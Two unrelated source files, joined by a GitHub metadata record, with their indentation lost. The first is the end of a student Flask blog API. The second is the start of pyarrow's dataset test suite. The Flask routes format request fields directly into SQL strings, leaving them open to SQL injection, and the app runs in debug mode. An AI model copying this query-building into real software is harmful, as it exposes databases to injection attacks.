returned = cursor.fetchone()
#if the username was wrong
if (cursor.rowcount == 0):
return None
if returned[0] == '':
return None
return returned[0]
@auth.error_handler
def unauthorized():
return make_response(jsonify({'error':'Bad username or password.'}),403)
# Some error handlers
@app.errorhandler(400)
def bad_request(error):
return make_response(jsonify( { 'error': 'Bad request' } ), 400)
@app.errorhandler(404)
def not_found(error):
return make_response(jsonify( { 'error': 'Not found' } ), 404)
@app.route('/login', methods=['GET','POST'])
@auth.login_required
def login():
if request.method == 'POST':
return make_response(jsonify({'error':'Success!'}),201)
else:
return make_response(jsonify({'error':'Failed!'}),404)
@app.route('/blog', methods=['POST','DELETE'])
@auth.login_required
def blog():
if request.method == 'POST':
#for command line:
# curl -u jtramley:"password" -H "Content-Type: application/json" -X POST -d '{"username":"jtramley", "title":"my first post", "content":"So this is my first blog "}' http://localhost:5000/blog
username = auth.username()
title = request.json.get('title',"")
print 'got title'
content = request.json.get('content',"")
print 'got content'
query = "insert into entries values(DEFAULT,'%s','%s','%s',DEFAULT)" %(title,content,username)
print 'request parsed'
connection = MySQLdb.connect(host=hosta,user=usera,passwd=passwda,db=dba, use_unicode=True, charset='utf8')
cursor = connection.cursor()
print 'connection created'
try:
cursor.execute(query)
print 'executed query'
except:
# Things messed up
return make_response(jsonify({"error":"Database Connection failure"}),500)
cursor.close()
connection.close()
return make_response(jsonify({'error':'Success!'}),201)
if request.method == 'DELETE':
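        #for command line (the entryID value is illustrative):
        # curl -u jtramley:"password" -H "Content-Type: application/json" -X DELETE -d '{"entryID":1}' http://localhost:5000/blog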
username = auth.username()
entryID = request.json.get('entryID',"")
connection = MySQLdb.connect(host=hosta,user=usera,passwd=passwda,db=dba, use_unicode=True, charset='utf8')
cursor = connection.cursor()
query = "select * from entries where EntryID='%s' and User='%s'" %(entryID,username)
try:
cursor.execute(query)
except:
return make_response(jsonify({"error":"Database Connection failure"}),500)
if (cursor.rowcount != 0):
query = "delete from entries where EntryID='%s' and User='%s'" %(entryID,username)
try:
cursor.execute(query)
except:
return make_response(jsonify({"error":"Database Connection failure"}),500)
cursor.close()
connection.close()
return make_response(jsonify({'error':'Success!'}),201)
else:
return make_response(jsonify({'error':'Failed!'}),403)
#Return entries by User each page will have 5 entries.
@app.route('/blog/<username>/<int:page>')
def getEntries(username, page):
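    # Example request (illustrative): GET http://localhost:5000/blog/jtramley/1
    # returns page 1 (up to 5 entries) for user jtramley as JSON.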
connection = MySQLdb.connect(host=hosta,user=usera,passwd=passwda,db=dba)
cursor = connection.cursor(MySQLdb.cursors.DictCursor)
query = "call getEntryByUser('%s')" %(username)
try:
cursor.execute(query)
except:
# Things messed up
return make_response(jsonify({"error":"Database Connection failure"}),500)
set = cursor.fetchall()
entries = []
i = (page-1) * 5
while(i < page*5 and i < len(set)):
entries.append(set[i])
i+=1
cursor.close()
connection.close()
return jsonify({'entry': entries})
if __name__ == '__main__':
app.run(host='info3103.cs.unb.ca', port=1319, debug=True)
| {
"content_hash": "bbac8c440da2296a6c2b9b82fe58922c",
"timestamp": "",
"source": "github",
"line_count": 157,
"max_line_length": 196,
"avg_line_length": 27.738853503184714,
"alnum_prop": 0.6920780711825488,
"repo_name": "DevMoore94/FlaskBlog",
"id": "46ab19c33f6785790dfdd3e13f67585d3e018dc0",
"size": "4377",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "blog.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "152618"
},
{
"name": "HTML",
"bytes": "8934"
},
{
"name": "Python",
"bytes": "4377"
}
],
"symlink_target": ""
} |
import contextlib
import os
import posixpath
import datetime
import pathlib
import pickle
import sys
import textwrap
import tempfile
import threading
import time
import numpy as np
import pytest
import pyarrow as pa
import pyarrow.compute as pc
import pyarrow.csv
import pyarrow.feather
import pyarrow.fs as fs
from pyarrow.tests.util import (change_cwd, _filesystem_uri,
FSProtocolClass, ProxyHandler,
_configure_s3_limited_user)
try:
import pandas as pd
except ImportError:
pd = None
try:
import pyarrow.dataset as ds
except ImportError:
ds = None
try:
import pyarrow.parquet as pq
except ImportError:
pq = None
# Marks all of the tests in this module
# Ignore these with pytest ... -m 'not dataset'
pytestmark = pytest.mark.dataset
def _generate_data(n):
import datetime
import itertools
day = datetime.datetime(2000, 1, 1)
interval = datetime.timedelta(days=5)
colors = itertools.cycle(['green', 'blue', 'yellow', 'red', 'orange'])
data = []
for i in range(n):
data.append((day, i, float(i), next(colors)))
day += interval
return pd.DataFrame(data, columns=['date', 'index', 'value', 'color'])
def _table_from_pandas(df):
schema = pa.schema([
pa.field('date', pa.date32()),
pa.field('index', pa.int64()),
pa.field('value', pa.float64()),
pa.field('color', pa.string()),
])
table = pa.Table.from_pandas(df, schema=schema, preserve_index=False)
return table.replace_schema_metadata()
@pytest.fixture
@pytest.mark.parquet
def mockfs():
mockfs = fs._MockFileSystem()
directories = [
'subdir/1/xxx',
'subdir/2/yyy',
]
for i, directory in enumerate(directories):
path = '{}/file{}.parquet'.format(directory, i)
mockfs.create_dir(directory)
with mockfs.open_output_stream(path) as out:
data = [
list(range(5)),
list(map(float, range(5))),
list(map(str, range(5))),
[i] * 5,
[{'a': j % 3, 'b': str(j % 3)} for j in range(5)],
]
schema = pa.schema([
('i64', pa.int64()),
('f64', pa.float64()),
('str', pa.string()),
('const', pa.int64()),
('struct', pa.struct({'a': pa.int64(), 'b': pa.string()})),
])
batch = pa.record_batch(data, schema=schema)
table = pa.Table.from_batches([batch])
pq.write_table(table, out)
return mockfs
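# The mock filesystem above contains two Parquet files with five rows each:
#   subdir/1/xxx/file0.parquet  (const == 0)
#   subdir/2/yyy/file1.parquet  (const == 1)
# The '1/xxx' and '2/yyy' directory levels are what the DirectoryPartitioning
# used by the fixtures and tests below parses into 'group' and 'key'.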
@pytest.fixture
def open_logging_fs(monkeypatch):
from pyarrow.fs import PyFileSystem, LocalFileSystem
from .test_fs import ProxyHandler
localfs = LocalFileSystem()
def normalized(paths):
return {localfs.normalize_path(str(p)) for p in paths}
opened = set()
def open_input_file(self, path):
path = localfs.normalize_path(str(path))
opened.add(path)
return self._fs.open_input_file(path)
# patch proxyhandler to log calls to open_input_file
monkeypatch.setattr(ProxyHandler, "open_input_file", open_input_file)
fs = PyFileSystem(ProxyHandler(localfs))
@contextlib.contextmanager
def assert_opens(expected_opened):
opened.clear()
try:
yield
finally:
assert normalized(opened) == normalized(expected_opened)
return fs, assert_opens
@pytest.fixture(scope='module')
def multisourcefs(request):
request.config.pyarrow.requires('pandas')
request.config.pyarrow.requires('parquet')
df = _generate_data(1000)
mockfs = fs._MockFileSystem()
# simply split the dataframe into four chunks to construct a data source
# from each chunk into its own directory
df_a, df_b, df_c, df_d = np.array_split(df, 4)
# create a directory containing a flat sequence of parquet files without
# any partitioning involved
mockfs.create_dir('plain')
for i, chunk in enumerate(np.array_split(df_a, 10)):
path = 'plain/chunk-{}.parquet'.format(i)
with mockfs.open_output_stream(path) as out:
pq.write_table(_table_from_pandas(chunk), out)
# create one with schema partitioning by weekday and color
mockfs.create_dir('schema')
for part, chunk in df_b.groupby([df_b.date.dt.dayofweek, df_b.color]):
folder = 'schema/{}/{}'.format(*part)
path = '{}/chunk.parquet'.format(folder)
mockfs.create_dir(folder)
with mockfs.open_output_stream(path) as out:
pq.write_table(_table_from_pandas(chunk), out)
# create one with hive partitioning by year and month
mockfs.create_dir('hive')
for part, chunk in df_c.groupby([df_c.date.dt.year, df_c.date.dt.month]):
folder = 'hive/year={}/month={}'.format(*part)
path = '{}/chunk.parquet'.format(folder)
mockfs.create_dir(folder)
with mockfs.open_output_stream(path) as out:
pq.write_table(_table_from_pandas(chunk), out)
# create one with hive partitioning by color
mockfs.create_dir('hive_color')
for part, chunk in df_d.groupby("color"):
folder = 'hive_color/color={}'.format(part)
path = '{}/chunk.parquet'.format(folder)
mockfs.create_dir(folder)
with mockfs.open_output_stream(path) as out:
pq.write_table(_table_from_pandas(chunk), out)
return mockfs
@pytest.fixture
@pytest.mark.parquet
def dataset(mockfs):
format = ds.ParquetFileFormat()
selector = fs.FileSelector('subdir', recursive=True)
options = ds.FileSystemFactoryOptions('subdir')
options.partitioning = ds.DirectoryPartitioning(
pa.schema([
pa.field('group', pa.int32()),
pa.field('key', pa.string())
])
)
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
return factory.finish()
@pytest.fixture(params=[
(True),
(False)
], ids=['threaded', 'serial'])
def dataset_reader(request):
'''
Fixture which allows dataset scanning operations to be
run with/without threads
'''
use_threads = request.param
class reader:
def __init__(self):
self.use_threads = use_threads
def _patch_kwargs(self, kwargs):
if 'use_threads' in kwargs:
raise Exception(
('Invalid use of dataset_reader, do not specify'
' use_threads'))
kwargs['use_threads'] = use_threads
def to_table(self, dataset, **kwargs):
self._patch_kwargs(kwargs)
return dataset.to_table(**kwargs)
def to_batches(self, dataset, **kwargs):
self._patch_kwargs(kwargs)
return dataset.to_batches(**kwargs)
def scanner(self, dataset, **kwargs):
self._patch_kwargs(kwargs)
return dataset.scanner(**kwargs)
def head(self, dataset, num_rows, **kwargs):
self._patch_kwargs(kwargs)
return dataset.head(num_rows, **kwargs)
def take(self, dataset, indices, **kwargs):
self._patch_kwargs(kwargs)
return dataset.take(indices, **kwargs)
def count_rows(self, dataset, **kwargs):
self._patch_kwargs(kwargs)
return dataset.count_rows(**kwargs)
return reader()
@pytest.mark.parquet
def test_filesystem_dataset(mockfs):
schema = pa.schema([
pa.field('const', pa.int64())
])
file_format = ds.ParquetFileFormat()
paths = ['subdir/1/xxx/file0.parquet', 'subdir/2/yyy/file1.parquet']
partitions = [ds.field('part') == x for x in range(1, 3)]
fragments = [file_format.make_fragment(path, mockfs, part)
for path, part in zip(paths, partitions)]
root_partition = ds.field('level') == ds.scalar(1337)
dataset_from_fragments = ds.FileSystemDataset(
fragments, schema=schema, format=file_format,
filesystem=mockfs, root_partition=root_partition,
)
dataset_from_paths = ds.FileSystemDataset.from_paths(
paths, schema=schema, format=file_format, filesystem=mockfs,
partitions=partitions, root_partition=root_partition,
)
for dataset in [dataset_from_fragments, dataset_from_paths]:
assert isinstance(dataset, ds.FileSystemDataset)
assert isinstance(dataset.format, ds.ParquetFileFormat)
assert dataset.partition_expression.equals(root_partition)
assert set(dataset.files) == set(paths)
fragments = list(dataset.get_fragments())
for fragment, partition, path in zip(fragments, partitions, paths):
assert fragment.partition_expression.equals(partition)
assert fragment.path == path
assert isinstance(fragment.format, ds.ParquetFileFormat)
assert isinstance(fragment, ds.ParquetFileFragment)
assert fragment.row_groups == [0]
assert fragment.num_row_groups == 1
row_group_fragments = list(fragment.split_by_row_group())
assert fragment.num_row_groups == len(row_group_fragments) == 1
assert isinstance(row_group_fragments[0], ds.ParquetFileFragment)
assert row_group_fragments[0].path == path
assert row_group_fragments[0].row_groups == [0]
assert row_group_fragments[0].num_row_groups == 1
fragments = list(dataset.get_fragments(filter=ds.field("const") == 0))
assert len(fragments) == 2
# the root_partition keyword has a default
dataset = ds.FileSystemDataset(
fragments, schema=schema, format=file_format, filesystem=mockfs
)
assert dataset.partition_expression.equals(ds.scalar(True))
# from_paths partitions have defaults
dataset = ds.FileSystemDataset.from_paths(
paths, schema=schema, format=file_format, filesystem=mockfs
)
assert dataset.partition_expression.equals(ds.scalar(True))
for fragment in dataset.get_fragments():
assert fragment.partition_expression.equals(ds.scalar(True))
# validation of required arguments
with pytest.raises(TypeError, match="incorrect type"):
ds.FileSystemDataset(fragments, file_format, schema)
# validation of root_partition
with pytest.raises(TypeError, match="incorrect type"):
ds.FileSystemDataset(fragments, schema=schema,
format=file_format, root_partition=1)
# missing required argument in from_paths
with pytest.raises(TypeError, match="incorrect type"):
ds.FileSystemDataset.from_paths(fragments, format=file_format)
def test_filesystem_dataset_no_filesystem_interaction(dataset_reader):
# ARROW-8283
schema = pa.schema([
pa.field('f1', pa.int64())
])
file_format = ds.IpcFileFormat()
paths = ['nonexistingfile.arrow']
# creating the dataset itself doesn't raise
dataset = ds.FileSystemDataset.from_paths(
paths, schema=schema, format=file_format,
filesystem=fs.LocalFileSystem(),
)
# getting fragments also doesn't raise
dataset.get_fragments()
# scanning does raise
with pytest.raises(FileNotFoundError):
dataset_reader.to_table(dataset)
@pytest.mark.parquet
def test_dataset(dataset, dataset_reader):
assert isinstance(dataset, ds.Dataset)
assert isinstance(dataset.schema, pa.Schema)
# TODO(kszucs): test non-boolean Exprs for filter do raise
expected_i64 = pa.array([0, 1, 2, 3, 4], type=pa.int64())
expected_f64 = pa.array([0, 1, 2, 3, 4], type=pa.float64())
for batch in dataset_reader.to_batches(dataset):
assert isinstance(batch, pa.RecordBatch)
assert batch.column(0).equals(expected_i64)
assert batch.column(1).equals(expected_f64)
for batch in dataset_reader.scanner(dataset).scan_batches():
assert isinstance(batch, ds.TaggedRecordBatch)
assert isinstance(batch.fragment, ds.Fragment)
table = dataset_reader.to_table(dataset)
assert isinstance(table, pa.Table)
assert len(table) == 10
condition = ds.field('i64') == 1
result = dataset.to_table(use_threads=True, filter=condition)
# Don't rely on the scanning order
result = result.sort_by('group').to_pydict()
assert result['i64'] == [1, 1]
assert result['f64'] == [1., 1.]
assert sorted(result['group']) == [1, 2]
assert sorted(result['key']) == ['xxx', 'yyy']
# Filtering on a nested field ref
condition = ds.field(('struct', 'b')) == '1'
result = dataset.to_table(use_threads=True, filter=condition)
result = result.sort_by('group').to_pydict()
assert result['i64'] == [1, 4, 1, 4]
assert result['f64'] == [1.0, 4.0, 1.0, 4.0]
assert result['group'] == [1, 1, 2, 2]
assert result['key'] == ['xxx', 'xxx', 'yyy', 'yyy']
# Projecting on a nested field ref expression
projection = {
'i64': ds.field('i64'),
'f64': ds.field('f64'),
'new': ds.field(('struct', 'b')) == '1',
}
result = dataset.to_table(use_threads=True, columns=projection)
result = result.sort_by('i64').to_pydict()
assert list(result) == ['i64', 'f64', 'new']
assert result['i64'] == [0, 0, 1, 1, 2, 2, 3, 3, 4, 4]
assert result['f64'] == [0.0, 0.0, 1.0, 1.0,
2.0, 2.0, 3.0, 3.0, 4.0, 4.0]
assert result['new'] == [False, False, True, True, False, False,
False, False, True, True]
@pytest.mark.parquet
def test_scanner_options(dataset):
scanner = dataset.to_batches(fragment_readahead=16, batch_readahead=8)
batch = next(scanner)
assert batch.num_columns == 7
@pytest.mark.parquet
def test_scanner(dataset, dataset_reader):
scanner = dataset_reader.scanner(
dataset, memory_pool=pa.default_memory_pool())
assert isinstance(scanner, ds.Scanner)
with pytest.raises(pa.ArrowInvalid):
dataset_reader.scanner(dataset, columns=['unknown'])
scanner = dataset_reader.scanner(dataset, columns=['i64'],
memory_pool=pa.default_memory_pool())
assert scanner.dataset_schema == dataset.schema
assert scanner.projected_schema == pa.schema([("i64", pa.int64())])
assert isinstance(scanner, ds.Scanner)
table = scanner.to_table()
for batch in scanner.to_batches():
assert batch.schema == scanner.projected_schema
assert batch.num_columns == 1
assert table == scanner.to_reader().read_all()
assert table.schema == scanner.projected_schema
for i in range(table.num_rows):
indices = pa.array([i])
assert table.take(indices) == scanner.take(indices)
with pytest.raises(pa.ArrowIndexError):
scanner.take(pa.array([table.num_rows]))
assert table.num_rows == scanner.count_rows()
scanner = dataset_reader.scanner(dataset, columns=['__filename',
'__fragment_index',
'__batch_index',
'__last_in_fragment'],
memory_pool=pa.default_memory_pool())
table = scanner.to_table()
expected_names = ['__filename', '__fragment_index',
'__batch_index', '__last_in_fragment']
assert table.column_names == expected_names
sorted_table = table.sort_by('__fragment_index')
assert sorted_table['__filename'].to_pylist() == (
['subdir/1/xxx/file0.parquet'] * 5 +
['subdir/2/yyy/file1.parquet'] * 5)
assert sorted_table['__fragment_index'].to_pylist() == ([0] * 5 + [1] * 5)
assert sorted_table['__batch_index'].to_pylist() == [0] * 10
assert sorted_table['__last_in_fragment'].to_pylist() == [True] * 10
@pytest.mark.parquet
def test_scanner_async_deprecated(dataset):
with pytest.warns(FutureWarning):
dataset.scanner(use_async=False)
with pytest.warns(FutureWarning):
dataset.scanner(use_async=True)
with pytest.warns(FutureWarning):
dataset.to_table(use_async=False)
with pytest.warns(FutureWarning):
dataset.to_table(use_async=True)
with pytest.warns(FutureWarning):
dataset.head(1, use_async=False)
with pytest.warns(FutureWarning):
dataset.head(1, use_async=True)
with pytest.warns(FutureWarning):
ds.Scanner.from_dataset(dataset, use_async=False)
with pytest.warns(FutureWarning):
ds.Scanner.from_dataset(dataset, use_async=True)
with pytest.warns(FutureWarning):
ds.Scanner.from_fragment(
next(dataset.get_fragments()), use_async=False)
with pytest.warns(FutureWarning):
ds.Scanner.from_fragment(
next(dataset.get_fragments()), use_async=True)
@pytest.mark.parquet
def test_head(dataset, dataset_reader):
result = dataset_reader.head(dataset, 0)
assert result == pa.Table.from_batches([], schema=dataset.schema)
result = dataset_reader.head(dataset, 1, columns=['i64']).to_pydict()
assert result == {'i64': [0]}
result = dataset_reader.head(dataset, 2, columns=['i64'],
filter=ds.field('i64') > 1).to_pydict()
assert result == {'i64': [2, 3]}
result = dataset_reader.head(dataset, 1024, columns=['i64']).to_pydict()
assert result == {'i64': list(range(5)) * 2}
fragment = next(dataset.get_fragments())
result = fragment.head(1, columns=['i64']).to_pydict()
assert result == {'i64': [0]}
result = fragment.head(1024, columns=['i64']).to_pydict()
assert result == {'i64': list(range(5))}
@pytest.mark.parquet
def test_take(dataset, dataset_reader):
fragment = next(dataset.get_fragments())
for indices in [[1, 3], pa.array([1, 3])]:
expected = dataset_reader.to_table(fragment).take(indices)
assert dataset_reader.take(fragment, indices) == expected
with pytest.raises(IndexError):
dataset_reader.take(fragment, pa.array([5]))
for indices in [[1, 7], pa.array([1, 7])]:
assert dataset_reader.take(
dataset, indices) == dataset_reader.to_table(dataset).take(indices)
with pytest.raises(IndexError):
dataset_reader.take(dataset, pa.array([10]))
@pytest.mark.parquet
def test_count_rows(dataset, dataset_reader):
fragment = next(dataset.get_fragments())
assert dataset_reader.count_rows(fragment) == 5
assert dataset_reader.count_rows(
fragment, filter=ds.field("i64") == 4) == 1
assert dataset_reader.count_rows(dataset) == 10
# Filter on partition key
assert dataset_reader.count_rows(
dataset, filter=ds.field("group") == 1) == 5
# Filter on data
assert dataset_reader.count_rows(dataset, filter=ds.field("i64") >= 3) == 4
assert dataset_reader.count_rows(dataset, filter=ds.field("i64") < 0) == 0
def test_abstract_classes():
classes = [
ds.FileFormat,
ds.Scanner,
ds.Partitioning,
]
for klass in classes:
with pytest.raises(TypeError):
klass()
def test_partitioning():
schema = pa.schema([
pa.field('i64', pa.int64()),
pa.field('f64', pa.float64())
])
for klass in [ds.DirectoryPartitioning, ds.HivePartitioning,
ds.FilenamePartitioning]:
partitioning = klass(schema)
assert isinstance(partitioning, ds.Partitioning)
partitioning = ds.DirectoryPartitioning(
pa.schema([
pa.field('group', pa.int64()),
pa.field('key', pa.float64())
])
)
assert len(partitioning.dictionaries) == 2
assert all(x is None for x in partitioning.dictionaries)
expr = partitioning.parse('/3/3.14/')
assert isinstance(expr, ds.Expression)
expected = (ds.field('group') == 3) & (ds.field('key') == 3.14)
assert expr.equals(expected)
with pytest.raises(pa.ArrowInvalid):
partitioning.parse('/prefix/3/aaa')
expr = partitioning.parse('/3/')
expected = ds.field('group') == 3
assert expr.equals(expected)
partitioning = ds.HivePartitioning(
pa.schema([
pa.field('alpha', pa.int64()),
pa.field('beta', pa.int64())
]),
null_fallback='xyz'
)
assert len(partitioning.dictionaries) == 2
assert all(x is None for x in partitioning.dictionaries)
expr = partitioning.parse('/alpha=0/beta=3/')
expected = (
(ds.field('alpha') == ds.scalar(0)) &
(ds.field('beta') == ds.scalar(3))
)
assert expr.equals(expected)
expr = partitioning.parse('/alpha=xyz/beta=3/')
expected = (
(ds.field('alpha').is_null() & (ds.field('beta') == ds.scalar(3)))
)
assert expr.equals(expected)
for shouldfail in ['/alpha=one/beta=2/', '/alpha=one/', '/beta=two/']:
with pytest.raises(pa.ArrowInvalid):
partitioning.parse(shouldfail)
partitioning = ds.FilenamePartitioning(
pa.schema([
pa.field('group', pa.int64()),
pa.field('key', pa.float64())
])
)
assert len(partitioning.dictionaries) == 2
assert all(x is None for x in partitioning.dictionaries)
expr = partitioning.parse('3_3.14_')
assert isinstance(expr, ds.Expression)
expected = (ds.field('group') == 3) & (ds.field('key') == 3.14)
assert expr.equals(expected)
with pytest.raises(pa.ArrowInvalid):
partitioning.parse('prefix_3_aaa_')
partitioning = ds.DirectoryPartitioning(
pa.schema([
pa.field('group', pa.int64()),
pa.field('key', pa.dictionary(pa.int8(), pa.string()))
]),
dictionaries={
"key": pa.array(["first", "second", "third"]),
})
assert partitioning.dictionaries[0] is None
assert partitioning.dictionaries[1].to_pylist() == [
"first", "second", "third"]
partitioning = ds.FilenamePartitioning(
pa.schema([
pa.field('group', pa.int64()),
pa.field('key', pa.dictionary(pa.int8(), pa.string()))
]),
dictionaries={
"key": pa.array(["first", "second", "third"]),
})
assert partitioning.dictionaries[0] is None
assert partitioning.dictionaries[1].to_pylist() == [
"first", "second", "third"]
# test partitioning roundtrip
table = pa.table([
pa.array(range(20)), pa.array(np.random.randn(20)),
pa.array(np.repeat(['a', 'b'], 10))],
names=["f1", "f2", "part"]
)
partitioning_schema = pa.schema([("part", pa.string())])
for klass in [ds.DirectoryPartitioning, ds.HivePartitioning,
ds.FilenamePartitioning]:
with tempfile.TemporaryDirectory() as tempdir:
partitioning = klass(partitioning_schema)
ds.write_dataset(table, tempdir,
format='ipc', partitioning=partitioning)
load_back = ds.dataset(tempdir, format='ipc',
partitioning=partitioning)
load_back_table = load_back.to_table()
assert load_back_table.equals(table)
def test_expression_arithmetic_operators():
dataset = ds.dataset(pa.table({'a': [1, 2, 3], 'b': [2, 2, 2]}))
a = ds.field("a")
b = ds.field("b")
result = dataset.to_table(columns={
"a+1": a + 1,
"b-a": b - a,
"a*2": a * 2,
"a/b": a.cast("float64") / b,
})
expected = pa.table({
"a+1": [2, 3, 4], "b-a": [1, 0, -1],
"a*2": [2, 4, 6], "a/b": [0.5, 1.0, 1.5],
})
assert result.equals(expected)
def test_partition_keys():
a, b, c = [ds.field(f) == f for f in 'abc']
assert ds._get_partition_keys(a) == {'a': 'a'}
assert ds._get_partition_keys(a & b & c) == {f: f for f in 'abc'}
nope = ds.field('d') >= 3
assert ds._get_partition_keys(nope) == {}
assert ds._get_partition_keys(a & nope) == {'a': 'a'}
null = ds.field('a').is_null()
assert ds._get_partition_keys(null) == {'a': None}
@pytest.mark.parquet
def test_parquet_read_options():
opts1 = ds.ParquetReadOptions()
opts2 = ds.ParquetReadOptions(dictionary_columns=['a', 'b'])
opts3 = ds.ParquetReadOptions(coerce_int96_timestamp_unit="ms")
assert opts1.dictionary_columns == set()
assert opts2.dictionary_columns == {'a', 'b'}
assert opts1.coerce_int96_timestamp_unit == "ns"
assert opts3.coerce_int96_timestamp_unit == "ms"
assert opts1 == opts1
assert opts1 != opts2
assert opts1 != opts3
@pytest.mark.parquet
def test_parquet_file_format_read_options():
pff1 = ds.ParquetFileFormat()
pff2 = ds.ParquetFileFormat(dictionary_columns={'a'})
pff3 = ds.ParquetFileFormat(coerce_int96_timestamp_unit="s")
assert pff1.read_options == ds.ParquetReadOptions()
assert pff2.read_options == ds.ParquetReadOptions(dictionary_columns=['a'])
assert pff3.read_options == ds.ParquetReadOptions(
coerce_int96_timestamp_unit="s")
@pytest.mark.parquet
def test_parquet_scan_options():
opts1 = ds.ParquetFragmentScanOptions()
opts2 = ds.ParquetFragmentScanOptions(buffer_size=4096)
opts3 = ds.ParquetFragmentScanOptions(
buffer_size=2**13, use_buffered_stream=True)
opts4 = ds.ParquetFragmentScanOptions(buffer_size=2**13, pre_buffer=True)
opts5 = ds.ParquetFragmentScanOptions(
thrift_string_size_limit=123456,
thrift_container_size_limit=987654,)
assert opts1.use_buffered_stream is False
assert opts1.buffer_size == 2**13
assert opts1.pre_buffer is False
assert opts1.thrift_string_size_limit == 100_000_000 # default in C++
assert opts1.thrift_container_size_limit == 1_000_000 # default in C++
assert opts2.use_buffered_stream is False
assert opts2.buffer_size == 2**12
assert opts2.pre_buffer is False
assert opts3.use_buffered_stream is True
assert opts3.buffer_size == 2**13
assert opts3.pre_buffer is False
assert opts4.use_buffered_stream is False
assert opts4.buffer_size == 2**13
assert opts4.pre_buffer is True
assert opts5.thrift_string_size_limit == 123456
assert opts5.thrift_container_size_limit == 987654
assert opts1 == opts1
assert opts1 != opts2
assert opts2 != opts3
assert opts3 != opts4
assert opts5 != opts1
def test_file_format_pickling():
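    # File format objects should survive a pickle roundtrip and compare equal
    # to the original afterwards.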
formats = [
ds.IpcFileFormat(),
ds.CsvFileFormat(),
ds.CsvFileFormat(pa.csv.ParseOptions(delimiter='\t',
ignore_empty_lines=True)),
ds.CsvFileFormat(read_options=pa.csv.ReadOptions(
skip_rows=3, column_names=['foo'])),
ds.CsvFileFormat(read_options=pa.csv.ReadOptions(
skip_rows=3, block_size=2**20)),
]
try:
formats.append(ds.OrcFileFormat())
except ImportError:
pass
if pq is not None:
formats.extend([
ds.ParquetFileFormat(),
ds.ParquetFileFormat(dictionary_columns={'a'}),
ds.ParquetFileFormat(use_buffered_stream=True),
ds.ParquetFileFormat(
use_buffered_stream=True,
buffer_size=4096,
thrift_string_size_limit=123,
thrift_container_size_limit=456,
),
])
for file_format in formats:
assert pickle.loads(pickle.dumps(file_format)) == file_format
def test_fragment_scan_options_pickling():
options = [
ds.CsvFragmentScanOptions(),
ds.CsvFragmentScanOptions(
convert_options=pa.csv.ConvertOptions(strings_can_be_null=True)),
ds.CsvFragmentScanOptions(
read_options=pa.csv.ReadOptions(block_size=2**16)),
]
if pq is not None:
options.extend([
ds.ParquetFragmentScanOptions(buffer_size=4096),
ds.ParquetFragmentScanOptions(pre_buffer=True),
])
for option in options:
assert pickle.loads(pickle.dumps(option)) == option
@pytest.mark.parametrize('paths_or_selector', [
fs.FileSelector('subdir', recursive=True),
[
'subdir/1/xxx/file0.parquet',
'subdir/2/yyy/file1.parquet',
]
])
@pytest.mark.parametrize('pre_buffer', [False, True])
@pytest.mark.parquet
def test_filesystem_factory(mockfs, paths_or_selector, pre_buffer):
format = ds.ParquetFileFormat(
read_options=ds.ParquetReadOptions(dictionary_columns={"str"}),
pre_buffer=pre_buffer
)
options = ds.FileSystemFactoryOptions('subdir')
options.partitioning = ds.DirectoryPartitioning(
pa.schema([
pa.field('group', pa.int32()),
pa.field('key', pa.string())
])
)
assert options.partition_base_dir == 'subdir'
assert options.selector_ignore_prefixes == ['.', '_']
assert options.exclude_invalid_files is False
factory = ds.FileSystemDatasetFactory(
mockfs, paths_or_selector, format, options
)
inspected_schema = factory.inspect()
assert factory.inspect().equals(pa.schema([
pa.field('i64', pa.int64()),
pa.field('f64', pa.float64()),
pa.field('str', pa.dictionary(pa.int32(), pa.string())),
pa.field('const', pa.int64()),
pa.field('struct', pa.struct({'a': pa.int64(),
'b': pa.string()})),
pa.field('group', pa.int32()),
pa.field('key', pa.string()),
]), check_metadata=False)
assert isinstance(factory.inspect_schemas(), list)
assert isinstance(factory.finish(inspected_schema),
ds.FileSystemDataset)
assert factory.root_partition.equals(ds.scalar(True))
dataset = factory.finish()
assert isinstance(dataset, ds.FileSystemDataset)
scanner = dataset.scanner()
expected_i64 = pa.array([0, 1, 2, 3, 4], type=pa.int64())
expected_f64 = pa.array([0, 1, 2, 3, 4], type=pa.float64())
expected_str = pa.DictionaryArray.from_arrays(
pa.array([0, 1, 2, 3, 4], type=pa.int32()),
pa.array("0 1 2 3 4".split(), type=pa.string())
)
expected_struct = pa.array([{'a': i % 3, 'b': str(i % 3)}
for i in range(5)])
iterator = scanner.scan_batches()
for (batch, fragment), group, key in zip(iterator, [1, 2], ['xxx', 'yyy']):
expected_group = pa.array([group] * 5, type=pa.int32())
expected_key = pa.array([key] * 5, type=pa.string())
expected_const = pa.array([group - 1] * 5, type=pa.int64())
        # Partition expressions can't easily be introspected from Python,
        # so just check that one is attached
assert fragment.partition_expression is not None
assert batch.num_columns == 7
assert batch[0].equals(expected_i64)
assert batch[1].equals(expected_f64)
assert batch[2].equals(expected_str)
assert batch[3].equals(expected_const)
assert batch[4].equals(expected_struct)
assert batch[5].equals(expected_group)
assert batch[6].equals(expected_key)
table = dataset.to_table()
assert isinstance(table, pa.Table)
assert len(table) == 10
assert table.num_columns == 7
@pytest.mark.parquet
def test_make_fragment(multisourcefs):
parquet_format = ds.ParquetFileFormat()
dataset = ds.dataset('/plain', filesystem=multisourcefs,
format=parquet_format)
for path in dataset.files:
fragment = parquet_format.make_fragment(path, multisourcefs)
assert fragment.row_groups == [0]
row_group_fragment = parquet_format.make_fragment(path, multisourcefs,
row_groups=[0])
for f in [fragment, row_group_fragment]:
assert isinstance(f, ds.ParquetFileFragment)
assert f.path == path
assert isinstance(f.filesystem, type(multisourcefs))
assert row_group_fragment.row_groups == [0]
def test_make_csv_fragment_from_buffer(dataset_reader):
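    # Fragments can be created directly from an in-memory buffer instead of a
    # filesystem path; pickling such a fragment keeps access to the same data.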
content = textwrap.dedent("""
alpha,num,animal
a,12,dog
b,11,cat
c,10,rabbit
""")
buffer = pa.py_buffer(content.encode('utf-8'))
csv_format = ds.CsvFileFormat()
fragment = csv_format.make_fragment(buffer)
expected = pa.table([['a', 'b', 'c'],
[12, 11, 10],
['dog', 'cat', 'rabbit']],
names=['alpha', 'num', 'animal'])
assert dataset_reader.to_table(fragment).equals(expected)
pickled = pickle.loads(pickle.dumps(fragment))
assert dataset_reader.to_table(pickled).equals(fragment.to_table())
@pytest.mark.parquet
def test_make_parquet_fragment_from_buffer(dataset_reader):
arrays = [
pa.array(['a', 'b', 'c']),
pa.array([12, 11, 10]),
pa.array(['dog', 'cat', 'rabbit'])
]
